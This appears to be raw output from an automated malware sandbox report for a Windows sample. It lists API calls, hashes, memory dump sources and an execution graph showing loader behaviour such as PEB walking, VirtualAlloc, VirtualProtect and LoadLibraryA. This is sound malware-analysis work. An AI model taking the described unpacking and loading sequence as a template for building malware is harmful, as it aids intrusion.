                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9711C236200216BFCF129F61DC4496ABB65BB08715B11443AFA46E6290CB70DC219BD5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00782BEC
                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 00782BFC
                                                                                                                                                                                                                                • Part of subcall function 00782A80: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00782B63
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                                                                                                                                                                                              • String ID: q-x
                                                                                                                                                                                                                              • API String ID: 2843524283-3565582484
                                                                                                                                                                                                                              • Opcode ID: d9c3d09441dbe587aaeefa313806f8632b646abca727ece564654ab34df7893b
                                                                                                                                                                                                                              • Instruction ID: 4849b3dd1f807969edd71daf96f50d8cbe682998b71f077309ac4e06594e2639
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9c3d09441dbe587aaeefa313806f8632b646abca727ece564654ab34df7893b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 11016DB1D4011C9ADB34F624DC4AAEE77B8EF82310F0005E9E605D3082D9788F46CBD4
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ___std_exception_destroy.LIBVCRUNTIME ref: 0040C54A
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ___std_exception_destroy
                                                                                                                                                                                                                              • String ID: <(@$ios_base::failbit set
                                                                                                                                                                                                                              • API String ID: 4194217158-2207043977
                                                                                                                                                                                                                              • Opcode ID: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                                                                                                                                              • Instruction ID: 510b138892f27541a5fc2b77746a8308bc81fd1abdf09eb2229577c7a084af3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 174064d188b15a0c3ff1a9ac464eba264744374b79093bf8ecbc9bf692508c87
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7F0547260022876D2306A5ABC41B97FBCC8F51B65F24843FFD44966C2EBB8A94545EC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA43
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA51
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                              • String ID: pContext
                                                                                                                                                                                                                              • API String ID: 1687795959-2046700901
                                                                                                                                                                                                                              • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                                                                                                                                              • Instruction ID: ade17e21382ede40b1a5952a82a6294f61ec456501e49cb394cb07b135f863e7
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6F05939B005156BCB04EB59DC45C5EF7A9AF85760310007BFD02E3341DBB8ED068A98
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                                                                              • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                              • Opcode ID: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                              • Instruction ID: c6f184ec75521e876e515d43f5ba00c5ed257f9a1274f206ffdf003c13f5d3fb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 049c7e4c23b10554081dcb12690fd44b5a77b1d87ca30f0fc835f9c7ef2e3319
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 90F0A970640224CFDB22EF55E00555D3BB0AF92708F8640ABFC019B261CB3C9E658BAA
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E32
                                                                                                                                                                                                                                • Part of subcall function 0040BF53: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF67
                                                                                                                                                                                                                                • Part of subcall function 0040BF53: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFA4
                                                                                                                                                                                                                              • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E46
                                                                                                                                                                                                                                • Part of subcall function 0040BFFE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C025
                                                                                                                                                                                                                                • Part of subcall function 0040BFFE: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C096
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                              • String ID: F@
                                                                                                                                                                                                                              • API String ID: 2118720939-885931407
                                                                                                                                                                                                                              • Opcode ID: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                                                                                                                                                                              • Instruction ID: d8e2bd5d7c2d17c0e6b385c3bfe6b7baa890588314637a55e0c2b4eea0cd1ccb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f77639d1be2741e1496218e28cc5a769408766ab269e632485ad6d388fdfb1e8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80F058B14002069BEB20AF55C81279DB361FF80715F50843FE945BB2C1CB7CAA44CB8C
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D73
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00428D9A
                                                                                                                                                                                                                                • Part of subcall function 004285FD: RaiseException.KERNEL32(?,?,0040D874,00000000,00000000,00000000,00000000,?,?,?,?,0040D874,00000000,0045617C,00000000), ref: 0042865D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • Access violation - no RTTI data!, xrefs: 00428D6A
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                              • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                              • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                              • Opcode ID: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                                                                                                                                                                              • Instruction ID: 73ada6d1c6168317e08ecea3a8bb530ed306f4920f562436bdd15de4f867cbc4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 45152e5ace4b67971f4d5196e44e91b2d4b717c3ebfeb118b54d173c581d92e8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDE0DF726593186A9A04DA91B8469DE73EC8A14300BA0041FBE0092082EF2CF958826D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042381E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                              • String ID: jB$nB
                                                                                                                                                                                                                              • API String ID: 3275300208-1818383504
                                                                                                                                                                                                                              • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                              • Instruction ID: 59cecdb31c0df98e9f45a8df7d3f0483270f31b7733147966a644d233ca5dfda
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 20D05E3228C3252AE3346E5DB8017C6BAD88F01764F50C03FF94896682CFB9688882DC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212CB
                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 004212D9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                              • String ID: pThreadProxy
                                                                                                                                                                                                                              • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                              • Opcode ID: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                                                                                                                                              • Instruction ID: 8e926060578bb0aca53d69262477d947a6492ed66be404d99a0d2172ee8e52cc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bbaacc652030cb53615086be0ecc54042dc20d6199239edbaca0bb31b3565f8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFD05B31E0020866D700EBB5D806E4E77E85B10708F91457B7D15E6143EB78E5088AAC
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,<(@,00000000), ref: 0042AF10
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0042AF1E
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF79
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                              • Opcode ID: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                              • Instruction ID: b4e4fd9a0f0a1cd091c58849f1b07b04ac885d72683c28cc61e5c451b31866ac
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 52d4a7004019297d44bc7c19dc2dfefffb9580c93fe43c28174d6fe013107c11
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AF413870700222AFCB229F65EA44A6BBBA4EF01310F96416FFC5597291D73C8D11C75A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00782AA3,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00782AA3,00000000), ref: 007AB177
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 007AB185
                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00782AA3,00000000), ref: 007AB1E0
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_780000_g3toRYa6JE.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1717984340-0
                                                                                                                                                                                                                              • Opcode ID: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                              • Instruction ID: ca7ef8322102466de6f824e1eb8cc112311d243f4abe1a3940e21352a50b2de2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e536570b9c15492d0518b6f8e8b2d6b0fefd1f832faf498bff9e3d376521cf30
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5641D43160020AAFDB258F64C858BBE7BA5FF83311F14436AE859A71E2DB389D01C750

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:1.6%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:31.6%
                                                                                                                                                                                                                              Signature Coverage:11.2%
                                                                                                                                                                                                                              Total number of Nodes:98
                                                                                                                                                                                                                              Total number of Limit Nodes:6
                                                                                                                                                                                                                              execution_graph 26114 408880 26116 40888f 26114->26116 26115 408ab5 ExitProcess 26116->26115 26117 4088a4 GetCurrentProcessId GetCurrentThreadId 26116->26117 26123 408a9e 26116->26123 26119 4088ca 26117->26119 26120 4088ce SHGetSpecialFolderPathW GetForegroundWindow 26117->26120 26119->26120 26121 408974 26120->26121 26126 43eb20 26121->26126 26130 440240 FreeLibrary 26123->26130 26124 4089cf 26124->26123 26129 40ba80 FreeLibrary FreeLibrary 26124->26129 26131 441850 26126->26131 26128 43eb2a RtlAllocateHeap 26128->26124 26129->26123 26130->26115 26132 441870 26131->26132 26132->26128 26132->26132 26157 2140005 26162 214092b GetPEB 26157->26162 26159 2140030 26163 214003c 26159->26163 26162->26159 26164 2140049 26163->26164 26178 2140e0f SetErrorMode SetErrorMode 26164->26178 26169 2140265 26170 21402ce VirtualProtect 26169->26170 26172 214030b 26170->26172 26171 2140439 VirtualFree 26173 21405f4 LoadLibraryA 26171->26173 26177 21404be 26171->26177 26172->26171 26176 21408c7 26173->26176 26174 21404e3 LoadLibraryA 26174->26177 26177->26173 26177->26174 26179 2140223 26178->26179 26180 2140d90 26179->26180 26181 2140dad 26180->26181 26182 2140dbb GetPEB 26181->26182 26183 2140238 VirtualAlloc 26181->26183 26182->26183 26183->26169 26184 40ab12 26185 40ab22 26184->26185 26186 40ab3d WSAStartup 26185->26186 26187 443190 26188 4431b0 26187->26188 26189 443298 26188->26189 26191 4402c0 LdrInitializeThunk 26188->26191 26191->26189 26192 4434d0 26193 44350f 26192->26193 26194 4434e9 26192->26194 26194->26193 26198 4402c0 LdrInitializeThunk 26194->26198 26196 443538 26196->26193 26199 4402c0 LdrInitializeThunk 26196->26199 26198->26196 26199->26193 26200 4404b1 GetForegroundWindow 26201 4404ce 26200->26201 26207 440cde 26208 440ce8 26207->26208 26210 440dae 26208->26210 26213 4402c0 LdrInitializeThunk 26208->26213 26212 4402c0 LdrInitializeThunk 26210->26212 26212->26210 26213->26210 26214 40a69b 26215 40a770 26214->26215 26215->26215 26220 40b2b0 26215->26220 26217 40a7b9 26218 40b2b0 3 API calls 26217->26218 26219 40a8d9 26218->26219 26221 40b340 26220->26221 26221->26221 26223 40b365 26221->26223 26224 440260 26221->26224 26223->26217 26225 4402a5 26224->26225 26226 440286 26224->26226 26227 440278 26224->26227 26228 44029a 26224->26228 26233 43eb40 26225->26233 26231 44028b RtlReAllocateHeap 26226->26231 26227->26225 26227->26226 26229 43eb20 RtlAllocateHeap 26228->26229 26232 4402a0 26229->26232 26231->26232 26232->26221 26234 43eb53 26233->26234 26235 43eb55 26233->26235 26234->26232 26236 43eb5a RtlFreeHeap 26235->26236 26236->26232 26133 5a3776 26134 5a37e7 26133->26134 26137 5a3a1e 26134->26137 26138 5a3a2d 26137->26138 26141 5a41be 26138->26141 26144 5a41d9 26141->26144 26142 5a41e2 CreateToolhelp32Snapshot 26143 5a41fe Module32First 26142->26143 26142->26144 26145 5a420d 26143->26145 26146 5a3a1d 26143->26146 26144->26142 26144->26143 26148 5a3e7d 26145->26148 26149 5a3ea8 26148->26149 26150 5a3eb9 VirtualAlloc 26149->26150 26151 5a3ef1 26149->26151 26150->26151 26151->26151 26237 4409b8 26238 4409d0 26237->26238 26240 440a3e 26238->26240 26243 4402c0 LdrInitializeThunk 26238->26243 26241 440a8e 26240->26241 26244 4402c0 LdrInitializeThunk 26240->26244 26243->26240 26244->26241 26152 4406eb 26153 44070c 26152->26153 26155 44072e 26152->26155 26153->26155 26156 4402c0 LdrInitializeThunk 26153->26156 26156->26155

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 004088A4
                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 004088AE
                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408955
                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0040896A
                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00408AB7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                              • String ID: 6W01
                                                                                                                                                                                                                              • API String ID: 4063528623-326071965
                                                                                                                                                                                                                              • Opcode ID: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                                                                                                                                              • Instruction ID: 68999dc676c32329d0dd7cdb3a03855c51f4a57e0b82bf1efaa177e53c028fce
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 39779329cba8329f932d9f79242290fe4725b3bdf2e9b5d89c9d7ceec3140c35
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A0516A73B443040BD328EF659C46356BA879BC5314F0AC13EA985BB7E2ED78980586CA

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 119 40b2b0-40b338 120 40b340-40b349 119->120 120->120 121 40b34b-40b35e 120->121 123 40b700-40b74a 121->123 124 40b661-40b6ab call 408040 121->124 125 40b6b4-40b6ff 121->125 126 40b365-40b367 121->126 127 40b658-40b65c 121->127 128 40b36c-40b5a5 121->128 138 40b750-40b757 123->138 124->125 125->123 129 40ba61-40ba67 126->129 131 40ba52-40ba5e 127->131 130 40b5b0-40b635 128->130 134 40ba70 129->134 130->130 135 40b63b-40b646 130->135 131->129 139 40b64a-40b651 135->139 138->134 140 40ba00 138->140 141 40b804-40b80b 138->141 142 40b904-40b908 138->142 143 40b7c5 138->143 144 40ba06-40ba0a 138->144 145 40ba49 138->145 146 40b7cb-40b7d1 138->146 147 40b80d-40b81f 138->147 148 40b90d-40b92d 138->148 149 40b94d-40b954 138->149 150 40b990-40b994 138->150 151 40ba11-40ba16 138->151 152 40b9d8-40b9f4 138->152 153 40b95b-40b970 call 441c40 138->153 154 40b8dc-40b8e6 138->154 155 40ba1d 138->155 156 40b75e-40b76c 138->156 157 40b7e0-40b7e6 138->157 158 40b7a0-40b7bd call 441c40 138->158 159 40ba23-40ba30 138->159 160 40b9a3-40b9b5 138->160 161 40b8ed-40b902 call 441c40 138->161 162 40b7ef-40b7fd 138->162 163 40b972-40b976 138->163 164 40ba72-40ba79 138->164 165 40b773 138->165 166 40b934-40b946 138->166 167 40ba35-40ba38 138->167 168 40b779-40b794 call 441c40 138->168 169 40b97b-40b984 138->169 170 40b9bc-40b9c2 call 440260 138->170 171 40b9fd-40b9ff 138->171 139->123 139->124 139->125 139->127 139->138 139->140 139->141 139->142 139->143 139->144 139->146 139->147 139->148 139->149 139->150 139->151 139->152 139->153 139->154 139->155 139->156 139->157 139->159 139->160 139->161 139->162 139->163 139->166 139->167 139->169 139->170 139->171 174 40b83c-40b867 141->174 177 40ba3f-40ba42 142->177 143->146 144->134 144->142 144->145 144->151 144->153 144->155 144->158 144->161 144->163 144->164 144->165 144->167 144->168 145->131 146->157 175 40b820-40b834 147->175 148->134 148->140 148->142 148->144 148->145 148->149 148->150 148->151 148->152 148->153 148->155 148->158 148->159 148->160 148->161 148->163 148->164 148->165 148->166 148->167 148->168 148->169 148->170 148->171 149->134 149->142 149->145 149->153 149->158 149->161 149->163 149->164 149->165 149->168 188 40b99d 150->188 151->134 151->142 151->145 151->153 151->155 151->158 151->161 151->163 151->164 151->165 151->167 151->168 152->171 153->163 154->134 154->142 154->145 154->158 154->161 154->164 154->165 154->168 156->134 156->145 156->158 156->164 156->165 156->168 157->162 158->143 159->150 160->134 160->140 160->142 160->144 160->145 160->151 160->152 160->153 160->155 160->158 160->161 160->163 160->164 160->165 160->167 160->168 160->170 160->171 161->142 162->134 162->140 162->141 162->142 162->144 162->145 162->147 162->148 162->149 162->150 162->151 162->152 162->153 162->154 162->155 162->158 162->159 162->160 162->161 162->163 162->164 162->165 162->166 162->167 162->168 162->169 162->170 162->171 163->167 166->134 166->140 166->142 166->144 166->145 166->149 166->150 166->151 166->152 166->153 166->155 166->158 166->159 166->160 166->161 166->163 166->164 166->165 166->167 166->168 166->169 166->170 166->171 167->177 168->158 169->150 191 40b9c7-40b9d1 170->191 171->140 190 40b870-40b8b6 174->190 175->175 189 40b836-40b839 175->189 177->145 188->160 189->174 190->190 192 40b8b8-40b8d5 190->192 191->134 191->140 191->142 191->144 191->145 191->151 191->152 191->153 191->155 191->158 191->161 191->163 191->164 191->165 191->167 191->168 191->171 192->134 192->140 192->142 192->144 192->145 192->148 192->149 192->150 192->151 192->152 192->153 192->154 192->155 192->158 192->159 192->160 192->161 192->163 192->164 192->165 192->166 192->167 192->168 192->169 192->170 192->171
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 6C(]$?_oY$@w@q$Bc*}$K{Du$`/()$fWpQ
                                                                                                                                                                                                                              • API String ID: 0-74227037
                                                                                                                                                                                                                              • Opcode ID: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                                                                                                                                              • Instruction ID: 6cbb9b4a16d706e95eb7c5eb543f19fb0438a443f67131002351f3f2f8f3bf58
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38d3abca32f2cf0db45db9bcd24ebb0db54af3e6334d844c9839fcbf09972b5b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA1299B5205B01CFD324CF25D891B97BBF6FB45314F058A2DD5AA8BAA0DB74A406CF84

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 271 40aa32-40aa35 272 40aa82 271->272 273 40aa37-40aa5f 271->273 274 40aa60-40aa72 273->274 274->274 275 40aa74-40aa7b 274->275 278 40aa00-40aa12 275->278 278->278 279 40aa14-40aa2e 278->279
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: MO$MO
                                                                                                                                                                                                                              • API String ID: 0-3148518880
                                                                                                                                                                                                                              • Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                              • Instruction ID: de3bae81b745c0a1c58d0910fc7dee7dc7ce1027ddf7ad09ed428793afe2e5a8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BB119E742443818BEF148F649D916677FA0EF42320B2499A99C455F3CBC638C511CF69

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 307 4402c0-4402f2 LdrInitializeThunk
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • LdrInitializeThunk.NTDLL(0044316E,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 004402EE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000003.00000002.1788704510.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000003.00000002.1788704510.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_26A5.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
